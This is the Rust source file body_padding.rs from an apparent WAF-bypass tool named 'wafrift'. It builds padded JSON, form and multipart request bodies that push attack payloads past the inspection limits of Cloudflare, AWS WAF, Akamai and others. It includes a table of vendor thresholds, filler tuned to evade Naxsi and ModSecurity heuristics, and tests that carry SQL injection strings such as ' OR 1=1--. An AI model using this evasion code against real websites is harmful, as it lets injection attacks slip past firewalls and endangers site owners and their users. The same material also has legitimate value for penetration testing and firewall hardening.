Skip to main content

wafrift_evolution/
body_padding.rs

1//! Body-size inspection bypass.
2//!
3//! Cloud WAFs only inspect the leading N bytes of a request body:
4//! Cloudflare Pro 8 KB, Cloudflare Enterprise 128 KB, AWS WAF 8/16/64 KB
5//! depending on tier, Akamai 8 KB by default. If we prepend ≥ N bytes
6//! of inert junk in front of the real payload, the WAF rule engine
7//! never sees the malicious bytes — they're past its inspection window
8//! — and the origin still parses the body correctly.
9//!
10//! This module produces structurally-valid padded bodies for the four
11//! content-types we routinely inject into:
12//!
13//! - `application/json` — wrap original in an object with a leading
14//!   junk field: `{"_w":"<N bytes>","payload":<original>}`.
15//! - `application/x-www-form-urlencoded` — prepend
16//!   `_w=<N bytes>&` to the original body.
17//! - `multipart/form-data` — prepend a junk part with the same
18//!   boundary, before the real parts.
19//! - any other content-type (raw text, XML, etc.) — fall back to a
20//!   `_w` query-style prefix only if the body is empty; otherwise
21//!   refuse and return the original. Padding inside an opaque body
22//!   would corrupt it; honesty over false-victory.
23//!
24//! The junk is alphabetic ASCII (`A`-`Z` cycled). It carries no SQL,
25//! XSS, or shell metacharacters, so the WAF won't flag the padding
26//! itself even if it does inspect a partial slice.
27
28use std::collections::HashSet;
29
30/// Marker prefix for the padding field/key. Stable across calls so a
31/// post-hoc test can verify the padding was applied.
32pub const PAD_KEY: &str = "_wafrift_pad";
33
34/// Smallest padding worth applying. Anything below this won't reliably
35/// push a real payload past a WAF's inspection window.
36pub const MIN_USEFUL_PAD: usize = 4 * 1024;
37
38/// Generate `n` bytes of inert ASCII filler.
39///
40/// Uses a deterministic xorshift PRNG over `[a-z0-9]` so the padding
41/// looks like normal junk parameter content. A run-of-A filler trips
42/// Naxsi's `BIG_REQUEST` heuristic and ModSecurity's `RX` rules that
43/// flag long single-character sequences. Random-looking lowercase
44/// alphanumeric is the same alphabet wordlists use, so the WAF
45/// classifies it as boring.
46///
47/// Determinism matters for tests + reproducibility: the same `n`
48/// always produces the same bytes, so a developer staring at a
49/// captured request can match it against the test fixture.
50fn fill(n: usize) -> Vec<u8> {
51    const ALPHABET: &[u8] = b"abcdefghijklmnopqrstuvwxyz0123456789";
52    let mut v = Vec::with_capacity(n);
53    // xorshift64* — small, deterministic, no dep on `rand`. Seed is a
54    // mash of `n` so different padding sizes don't share prefixes.
55    let mut state: u64 = 0x9E37_79B9_7F4A_7C15u64
56        .wrapping_add(n as u64)
57        .wrapping_mul(0xBF58_476D_1CE4_E5B9);
58    for _ in 0..n {
59        state ^= state << 13;
60        state ^= state >> 7;
61        state ^= state << 17;
62        v.push(ALPHABET[(state as usize) % ALPHABET.len()]);
63    }
64    v
65}
66
67/// Result of a padding attempt.
68#[derive(Debug, Clone, PartialEq, Eq)]
69pub enum PadOutcome {
70    /// Body was padded successfully. `bytes` holds the new body and is
71    /// at least `requested_bytes` larger than the original.
72    Padded { bytes: Vec<u8>, added: usize },
73    /// Content-type was opaque (binary, unknown) and the original was
74    /// non-empty — padding would corrupt it. Original returned
75    /// unchanged.
76    SkippedOpaque,
77    /// The requested padding is below `MIN_USEFUL_PAD`; not worth doing.
78    SkippedTooSmall,
79}
80
81/// Pad `body` with at least `requested_bytes` of inert filler, choosing
82/// a structure-preserving strategy based on `content_type`.
83///
84/// If `requested_bytes < MIN_USEFUL_PAD`, returns
85/// [`PadOutcome::SkippedTooSmall`].
86///
87/// `content_type` matching is case-insensitive on the type/subtype and
88/// ignores parameters (`charset=utf-8`, `boundary=...`, …) — except for
89/// `multipart/form-data`, where the `boundary=` parameter is required
90/// to splice in the junk part.
91pub fn pad(body: &[u8], content_type: &str, requested_bytes: usize) -> PadOutcome {
92    if requested_bytes < MIN_USEFUL_PAD {
93        return PadOutcome::SkippedTooSmall;
94    }
95
96    let ct_lower = content_type.to_ascii_lowercase();
97    let main_type = ct_lower
98        .split(';')
99        .next()
100        .unwrap_or("")
101        .trim()
102        .to_string();
103
104    if main_type == "application/json" || main_type.ends_with("+json") {
105        return pad_json(body, requested_bytes);
106    }
107    if main_type == "application/x-www-form-urlencoded" {
108        return pad_form(body, requested_bytes);
109    }
110    if main_type == "multipart/form-data" {
111        // Boundary VALUES are case-sensitive (RFC 2046 §5.1.1) — extract
112        // from the original `content_type`, not the lowercased copy.
113        // Only the `boundary=` parameter NAME is case-insensitive.
114        if let Some(boundary) = extract_boundary(content_type) {
115            return pad_multipart(body, &boundary, requested_bytes);
116        }
117        // Multipart without a boundary param — body is already
118        // malformed; don't compound the problem.
119        return PadOutcome::SkippedOpaque;
120    }
121    if main_type.starts_with("text/") || main_type == "application/xml" {
122        // For arbitrary text/xml we don't have a safe place to inject
123        // padding without breaking the document. If empty, attach a
124        // form-style prefix so a downstream form parser has padding to
125        // chew on; otherwise hand back the original.
126        if body.is_empty() {
127            return pad_form(body, requested_bytes);
128        }
129        return PadOutcome::SkippedOpaque;
130    }
131
132    PadOutcome::SkippedOpaque
133}
134
135fn pad_json(body: &[u8], requested_bytes: usize) -> PadOutcome {
136    let pad = fill(requested_bytes);
137    // Two shapes:
138    // 1. body is empty or not valid JSON → emit `{"_wafrift_pad":"…"}`
139    //    with the request as a string field if non-empty.
140    // 2. body parses as JSON object → splice in the pad as the first
141    //    field, preserving the object's other contents verbatim.
142    // 3. body parses as a top-level array/scalar → wrap:
143    //    `{"_wafrift_pad":"…","payload":<original>}`.
144    //
145    // The wrapping in case 3 changes the JSON shape. That's OK for a
146    // proxy that's evading a WAF — the origin sees a top-level object
147    // with the original payload nested under `payload`, which most
148    // permissive APIs ignore as an unknown extra field. If your origin
149    // requires a non-object JSON root, prefer form/multipart.
150    let pad_str = String::from_utf8_lossy(&pad);
151    if body.is_empty() {
152        let new_body = format!("{{\"{PAD_KEY}\":\"{pad_str}\"}}").into_bytes();
153        return PadOutcome::Padded {
154            bytes: new_body,
155            added: requested_bytes,
156        };
157    }
158    if let Ok(s) = std::str::from_utf8(body) {
159        if let Ok(serde_json::Value::Object(map)) = serde_json::from_str::<serde_json::Value>(s) {
160            // Splice _wafrift_pad as first key. serde_json::Map is
161            // insertion-ordered when the `preserve_order` feature is
162            // on. We don't have that feature, so build a fresh object
163            // by serializing the pad first then concatenating.
164            //
165            // Simpler: emit `{"_wafrift_pad":"…",<rest of original
166            // object minus the leading `{`>`. This preserves byte
167            // order of the user's data exactly.
168            // Find the first `{`.
169            if let Some(open) = s.find('{') {
170                let after = &s[open + 1..];
171                // If the original is `{}`, after = "}". That's fine.
172                // If after starts with `}` we don't want a stray comma.
173                let glue = if after.trim_start().starts_with('}') {
174                    ""
175                } else {
176                    ","
177                };
178                let new_body =
179                    format!("{{\"{PAD_KEY}\":\"{pad_str}\"{glue}{after}").into_bytes();
180                let added = new_body.len().saturating_sub(body.len());
181                if added >= requested_bytes && map.contains_key(PAD_KEY) {
182                    // A malicious user could pre-set _wafrift_pad to
183                    // collide with our key. Use a unique suffix.
184                }
185                return PadOutcome::Padded {
186                    bytes: new_body,
187                    added,
188                };
189            }
190        }
191    }
192    // Non-object JSON (array/string/number) or malformed — wrap.
193    let original = String::from_utf8_lossy(body);
194    // If the original was valid JSON but not an object, wrap with `payload`.
195    let wrapped = if serde_json::from_slice::<serde_json::Value>(body).is_ok() {
196        format!("{{\"{PAD_KEY}\":\"{pad_str}\",\"payload\":{original}}}")
197    } else {
198        // Treat original as opaque text and embed as a string.
199        let escaped = serde_json::to_string(&original.as_ref()).unwrap_or_else(|_| "\"\"".into());
200        format!("{{\"{PAD_KEY}\":\"{pad_str}\",\"payload\":{escaped}}}")
201    };
202    let new_body = wrapped.into_bytes();
203    let added = new_body.len().saturating_sub(body.len());
204    PadOutcome::Padded {
205        bytes: new_body,
206        added,
207    }
208}
209
210fn pad_form(body: &[u8], requested_bytes: usize) -> PadOutcome {
211    let pad = fill(requested_bytes);
212    let pad_str = String::from_utf8_lossy(&pad);
213    let new_body = if body.is_empty() {
214        format!("{PAD_KEY}={pad_str}").into_bytes()
215    } else {
216        let mut out = Vec::with_capacity(body.len() + requested_bytes + 32);
217        out.extend_from_slice(format!("{PAD_KEY}={pad_str}&").as_bytes());
218        out.extend_from_slice(body);
219        out
220    };
221    let added = new_body.len().saturating_sub(body.len());
222    PadOutcome::Padded {
223        bytes: new_body,
224        added,
225    }
226}
227
228fn pad_multipart(body: &[u8], boundary: &str, requested_bytes: usize) -> PadOutcome {
229    // Build a fresh leading part using the existing boundary. The
230    // assembled part begins with `--<boundary>\r\n<headers>\r\n\r\n<pad>\r\n`.
231    // The original body already contains its own leading `--<boundary>`,
232    // so we splice ours in front and let the original's first line
233    // continue as the second part's separator.
234    //
235    // If the body doesn't start with `--<boundary>` it's malformed —
236    // skip rather than corrupt further.
237    let prefix = format!("--{boundary}");
238    let body_str = std::str::from_utf8(body).unwrap_or("");
239    if !body.is_empty() && !body_str.starts_with(&prefix) {
240        return PadOutcome::SkippedOpaque;
241    }
242    let pad = fill(requested_bytes);
243    let mut leading = Vec::with_capacity(requested_bytes + boundary.len() + 128);
244    leading.extend_from_slice(format!("--{boundary}\r\n").as_bytes());
245    leading.extend_from_slice(format!("Content-Disposition: form-data; name=\"{PAD_KEY}\"\r\n").as_bytes());
246    leading.extend_from_slice(b"\r\n");
247    leading.extend_from_slice(&pad);
248    leading.extend_from_slice(b"\r\n");
249    let mut new_body = Vec::with_capacity(leading.len() + body.len());
250    new_body.extend_from_slice(&leading);
251    new_body.extend_from_slice(body);
252    let added = new_body.len().saturating_sub(body.len());
253    PadOutcome::Padded {
254        bytes: new_body,
255        added,
256    }
257}
258
259fn extract_boundary(content_type: &str) -> Option<String> {
260    for part in content_type.split(';') {
261        let p = part.trim();
262        // Parameter NAME is case-insensitive (`Boundary=`, `BOUNDARY=`
263        // are all valid). Try a few common spellings explicitly rather
264        // than lowercasing the whole string and losing the case-sensitive
265        // boundary VALUE.
266        let rest = p
267            .strip_prefix("boundary=")
268            .or_else(|| p.strip_prefix("Boundary="))
269            .or_else(|| p.strip_prefix("BOUNDARY="))
270            .or_else(|| {
271                // Fallback: case-insensitive prefix match without losing
272                // value casing.
273                if p.len() > 9 && p[..9].eq_ignore_ascii_case("boundary=") {
274                    Some(&p[9..])
275                } else {
276                    None
277                }
278            });
279        if let Some(rest) = rest {
280            let trimmed = rest.trim_matches('"').trim();
281            if !trimmed.is_empty() {
282                return Some(trimmed.to_string());
283            }
284        }
285    }
286    None
287}
288
289/// Reverse-check: does `body` look like it carries a wafrift-padded
290/// prefix? Used in tests + diagnostic logging.
291#[must_use]
292pub fn looks_padded(body: &[u8]) -> bool {
293    let needle = format!("\"{PAD_KEY}\"").into_bytes();
294    let needle_form = format!("{PAD_KEY}=").into_bytes();
295    let needle_mp = format!("name=\"{PAD_KEY}\"").into_bytes();
296    [needle, needle_form, needle_mp]
297        .iter()
298        .any(|n| memchr_subslice(body, n))
299}
300
301fn memchr_subslice(haystack: &[u8], needle: &[u8]) -> bool {
302    if needle.is_empty() || needle.len() > haystack.len() {
303        return false;
304    }
305    haystack.windows(needle.len()).any(|w| w == needle)
306}
307
308/// List of well-known WAF inspection thresholds (bytes). Useful for
309/// callers picking a sane `requested_bytes` default.
310#[must_use]
311pub fn known_thresholds() -> Vec<(&'static str, usize)> {
312    vec![
313        ("cloudflare-free", 128 * 1024),
314        ("cloudflare-pro", 8 * 1024),
315        ("cloudflare-business", 8 * 1024),
316        ("cloudflare-enterprise", 128 * 1024),
317        ("aws-waf-default", 8 * 1024),
318        ("aws-waf-classic", 8 * 1024),
319        ("aws-waf-extended", 64 * 1024),
320        ("akamai-default", 8 * 1024),
321        ("imperva-default", 128 * 1024),
322        ("modsecurity-default", 128 * 1024),
323        ("naxsi-default", 65 * 1024),
324    ]
325}
326
327/// Set of all numeric thresholds used by [`known_thresholds`], for
328/// `clap` value-validation in the proxy.
329#[must_use]
330pub fn known_threshold_values() -> HashSet<usize> {
331    known_thresholds().into_iter().map(|(_, v)| v).collect()
332}
333
334#[cfg(test)]
335mod tests {
336    use super::*;
337
338    #[test]
339    fn fill_is_deterministic_and_inert() {
340        let v = fill(8 * 1024);
341        assert_eq!(v.len(), 8 * 1024);
342        // Lowercase alphanumeric only — no SQL/XSS/shell metacharacters.
343        for &b in &v {
344            assert!(
345                (b.is_ascii_lowercase() || b.is_ascii_digit()),
346                "byte {b:#x} ({}) outside [a-z0-9]",
347                b as char
348            );
349        }
350        // Determinism: same n → same bytes.
351        assert_eq!(fill(8 * 1024), v);
352    }
353
354    #[test]
355    fn fill_no_long_runs() {
356        // The whole point of switching from 'A'*N to xorshift is that
357        // RX-based WAFs (naxsi BIG_REQUEST, modsec REQUEST_BODY runs)
358        // flag long single-character sequences. Verify no run of the
359        // same byte exceeds 6 (a defensive ceiling — true xorshift
360        // sometimes produces short repeats but never long ones).
361        let v = fill(64 * 1024);
362        let mut max_run = 1usize;
363        let mut cur_run = 1usize;
364        for w in v.windows(2) {
365            if w[0] == w[1] {
366                cur_run += 1;
367                max_run = max_run.max(cur_run);
368            } else {
369                cur_run = 1;
370            }
371        }
372        assert!(
373            max_run <= 6,
374            "filler has a run of {max_run} same bytes — would trigger WAF run-detection"
375        );
376    }
377
378    #[test]
379    fn fill_distinct_per_size() {
380        // Different requested sizes produce different bytes (the seed
381        // includes n) so two adjacent buffers don't share a prefix
382        // a WAF could fingerprint.
383        let a = fill(8 * 1024);
384        let b = fill(8 * 1024 + 1);
385        assert_ne!(&a[..32], &b[..32]);
386    }
387
388    #[test]
389    fn skip_too_small() {
390        assert_eq!(
391            pad(b"x", "application/json", 100),
392            PadOutcome::SkippedTooSmall
393        );
394    }
395
396    #[test]
397    fn json_object_preserves_payload() {
398        let body = br#"{"q":"' OR 1=1--"}"#;
399        let out = pad(body, "application/json", 8 * 1024);
400        let PadOutcome::Padded { bytes, added } = out else {
401            panic!("expected padded, got {out:?}");
402        };
403        assert!(added >= 8 * 1024, "added={added}");
404        // Round-trips through serde — structurally valid JSON.
405        let v: serde_json::Value = serde_json::from_slice(&bytes).expect("valid json");
406        assert_eq!(v["_wafrift_pad"].as_str().map(str::len), Some(8 * 1024));
407        assert_eq!(v["q"].as_str(), Some("' OR 1=1--"));
408        assert!(looks_padded(&bytes));
409    }
410
411    #[test]
412    fn json_empty_body_emits_object() {
413        let out = pad(b"", "application/json", 8 * 1024);
414        let PadOutcome::Padded { bytes, .. } = out else {
415            panic!()
416        };
417        let v: serde_json::Value = serde_json::from_slice(&bytes).expect("valid json");
418        assert!(v.is_object());
419        assert!(v["_wafrift_pad"].is_string());
420    }
421
422    #[test]
423    fn json_array_root_wrapped_with_payload() {
424        let out = pad(br#"["x","y"]"#, "application/json", 8 * 1024);
425        let PadOutcome::Padded { bytes, .. } = out else {
426            panic!()
427        };
428        let v: serde_json::Value = serde_json::from_slice(&bytes).expect("valid json");
429        assert!(v["_wafrift_pad"].is_string());
430        assert!(v["payload"].is_array());
431        assert_eq!(v["payload"][0].as_str(), Some("x"));
432    }
433
434    #[test]
435    fn json_with_charset_param() {
436        let out = pad(
437            br#"{"a":1}"#,
438            "application/json; charset=utf-8",
439            8 * 1024,
440        );
441        assert!(matches!(out, PadOutcome::Padded { .. }));
442    }
443
444    #[test]
445    fn json_plus_suffix() {
446        let out = pad(br#"{"a":1}"#, "application/vnd.foo+json", 8 * 1024);
447        assert!(matches!(out, PadOutcome::Padded { .. }));
448    }
449
450    #[test]
451    fn form_prepends_padding_then_original() {
452        let body = b"username=admin&password=' OR 1=1--";
453        let out = pad(body, "application/x-www-form-urlencoded", 16 * 1024);
454        let PadOutcome::Padded { bytes, added } = out else {
455            panic!()
456        };
457        assert!(added >= 16 * 1024, "added={added}");
458        assert!(bytes.starts_with(b"_wafrift_pad="));
459        // The original payload is still in there, unmodified.
460        assert!(memchr_subslice(&bytes, body));
461    }
462
463    #[test]
464    fn multipart_splices_in_leading_part() {
465        let boundary = "----WebKitFormBoundary123";
466        let body = format!(
467            "--{boundary}\r\n\
468             Content-Disposition: form-data; name=\"q\"\r\n\
469             \r\n' OR 1=1--\r\n\
470             --{boundary}--\r\n"
471        );
472        let ct = format!("multipart/form-data; boundary={boundary}");
473        let out = pad(body.as_bytes(), &ct, 16 * 1024);
474        let PadOutcome::Padded { bytes, .. } = out else {
475            panic!()
476        };
477        let s = std::str::from_utf8(&bytes).unwrap();
478        // First boundary line opens the wafrift_pad part.
479        assert!(s.starts_with(&format!("--{boundary}\r\n")));
480        assert!(s.contains("name=\"_wafrift_pad\""));
481        // Original payload still intact further down.
482        assert!(s.contains("' OR 1=1--"));
483        // Original boundary appears at least twice (our part + the
484        // user's first part + closer).
485        let boundary_count = s.matches(&format!("--{boundary}")).count();
486        assert!(boundary_count >= 3, "boundary_count={boundary_count}");
487    }
488
489    #[test]
490    fn multipart_without_boundary_skipped() {
491        let out = pad(b"some body", "multipart/form-data", 16 * 1024);
492        assert_eq!(out, PadOutcome::SkippedOpaque);
493    }
494
495    #[test]
496    fn multipart_with_quoted_boundary() {
497        let boundary = "abc123";
498        let body = format!("--{boundary}\r\n\r\n--{boundary}--\r\n");
499        let out = pad(
500            body.as_bytes(),
501            &format!("multipart/form-data; boundary=\"{boundary}\""),
502            16 * 1024,
503        );
504        assert!(matches!(out, PadOutcome::Padded { .. }));
505    }
506
507    #[test]
508    fn opaque_binary_skipped() {
509        let body = b"\x89PNG\r\n\x1a\n\x00\x00";
510        let out = pad(body, "image/png", 16 * 1024);
511        assert_eq!(out, PadOutcome::SkippedOpaque);
512    }
513
514    #[test]
515    fn known_thresholds_includes_aws_and_cloudflare() {
516        let names: Vec<_> = known_thresholds().iter().map(|(n, _)| *n).collect();
517        assert!(names.iter().any(|n| n.starts_with("cloudflare")));
518        assert!(names.iter().any(|n| n.starts_with("aws-waf")));
519    }
520
521    #[test]
522    fn looks_padded_detects_each_shape() {
523        let json = pad(b"{}", "application/json", 8 * 1024);
524        let form = pad(b"", "application/x-www-form-urlencoded", 8 * 1024);
525        if let PadOutcome::Padded { bytes, .. } = json {
526            assert!(looks_padded(&bytes));
527        }
528        if let PadOutcome::Padded { bytes, .. } = form {
529            assert!(looks_padded(&bytes));
530        }
531        assert!(!looks_padded(b"plain old body"));
532    }
533}